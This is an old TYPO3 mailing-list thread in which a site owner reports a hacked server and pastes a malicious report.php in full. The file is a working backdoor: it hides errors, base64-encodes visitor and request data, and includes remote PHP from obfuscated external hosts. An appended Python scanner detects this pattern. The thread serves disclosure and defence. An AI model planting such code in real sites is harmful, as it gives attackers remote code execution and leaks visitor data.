[Typo3] server hacked // report.php
Christoph Koehler
christoph.koehler at gmail.com
Thu Jul 21 18:59:48 CEST 2005
Pretty sure it's not in the source...
The contents of the file make a really long string of base64-encoded info,
like host, request URL and queries and all, and somehow also have these
URLs base64 decoded in them:
http://doc1.udrp.ru
http://doc3.udrp.ru
It also does this:
error_reporting(0);
ini_set(allow_url_fopen,1);
This is the whole content:
<? php
error_reporting(0);
ini_set(allow_url_fopen,1);
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] :
$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] :
$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] :
$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] :
$HTTP_REFERER);
$g=(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] :
$HTTP_USER_AGENT);
$h=(isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] :
$REMOTE_ADDR);
$str=base64_encode($a).'.'.base64_encode($b).'.'.base64_encode($c).'.'.base64_encode($d).'.'.base64_encode($e).'.'.base64_encode($f).'.'.base64_encode($g).'.'.base64_encode($h);
if
((include(base64_decode('aHR0cDovLw==').base64_decode('ZG9jMS51ZHJwLnJ1')."/?".$str)))
{}
else {
include(base64_decode('aHR0cDovLw==').base64_decode('ZG9jMy51ZHJwLnJ1')."/?".$str);
}
?>
The weird thing is those files have been there for a month! They are in
all my old backups...
Most directories were 777 chmod. I installed it through Fantastico... guess
I won't do that anymore!
On Thu, 21 Jul 2005 11:31:26 -0500, Christoph Koehler
<christoph.koehler at gmail.com> wrote:
> I actually noticed many .php files with this content in it and the
> htaccess file. Another one was called test.php
>
>
> On Thu, 21 Jul 2005 11:25:16 -0500, Christoph Koehler
> <christoph.koehler at gmail.com> wrote:
>
>> Hey there,
>>
>> I have reason to believe that the server we host TYPO3 on has been
>> hacked.
>> Now, in my TYPO3 directory, I see a file report.php, with an .htaccess
>> file making it the 404 error document.
>> Does anyone else have that file??
>>
>> Thanks!
>>
>> Christoph
>
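
A defender-side check for the pattern in the file quoted above, as an added example that is not part of the original post: it flags PHP source whose include/require target is built from base64_decode() literals that decode to a remote URL, plus the two runtime settings the file changes. The function names and the SAMPLE string (assembled from lines in the post) are assumptions of this example.

```python
import base64
import binascii
import re

# One base64_decode('...') call with a literal argument.
B64_CALL = r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)"
B64_CALL_RE = re.compile(B64_CALL, re.I)
# include/require whose argument starts with a chain of such calls joined by "."
INCLUDE_RE = re.compile(
    r"\b(?:include|require)(?:_once)?\b[\s(]*((?:" + B64_CALL + r"\s*\.?\s*)+)", re.I)
# Runtime settings the file in the post changes before including.
SETUP_RES = {
    "error_reporting(0)": re.compile(r"error_reporting\(\s*0\s*\)", re.I),
    "allow_url_fopen set at runtime": re.compile(r"ini_set\(\s*['\"]?allow_url_fopen", re.I),
}
REMOTE_RE = re.compile(r"(?:https?|ftp)://", re.I)

def decode_literal(literal):
    """Return the decoded text, or '' if the literal is not valid base64."""
    try:
        return base64.b64decode(literal, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return ""

def scan_php(source):
    """Return (kind, detail) findings for one PHP file's text."""
    findings = [("setup", label) for label, rx in SETUP_RES.items() if rx.search(source)]
    for stmt in INCLUDE_RE.finditer(source):
        # Join the decoded literals in order to recover the include target prefix.
        target = "".join(decode_literal(lit) for lit in B64_CALL_RE.findall(stmt.group(1)))
        if REMOTE_RE.match(target):
            findings.append(("remote-include", target))
    return findings

# Constructed sample: the settings and the two include lines quoted in the post.
SAMPLE = """<?php
error_reporting(0);
ini_set(allow_url_fopen,1);
if ((include(base64_decode('aHR0cDovLw==').base64_decode('ZG9jMS51ZHJwLnJ1')."/?".$str)))
{}
else {
include(base64_decode('aHR0cDovLw==').base64_decode('ZG9jMy51ZHJwLnJ1')."/?".$str);
}
?>"""

if __name__ == "__main__":
    for kind, detail in scan_php(SAMPLE):
        print(f"{kind}: {detail}")
```

Run over every .php file in the web root and in old backups, any "remote-include" finding marks a file to quarantine and a hostname to search for in proxy or DNS logs.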